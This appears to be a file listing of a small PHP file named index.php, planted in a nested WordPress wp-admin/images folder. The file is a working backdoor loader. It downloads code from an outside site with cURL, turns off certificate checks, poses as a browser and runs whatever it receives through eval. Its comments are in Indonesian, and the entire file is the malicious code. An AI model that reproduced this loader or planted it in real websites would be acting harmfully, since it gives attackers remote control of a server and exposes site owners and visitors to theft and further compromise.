• File: index.php
  • Full Path: /home/lef/public_html/wp-admin/images/images/assets/2023/jlzh/hfr/index.php
  • File size: 961 bytes
  • MIME-type: text/x-php
  • Charset: utf-8
<?php
// Kode dengan cURL dan eval untuk menjalankan kode dari URL eksternal
$url = 'https://stepmomhub.com/1.txt';

// Inisialisasi cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);

// Eksekusi cURL
$content = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

// Cek jika berhasil
if ($content === false) {
    die('Gagal mengambil konten: ' . $error);
}

if ($httpCode !== 200) {
    die('HTTP Error: ' . $httpCode);
}

// Jalankan kode dengan eval
eval('?>' . $content);
?>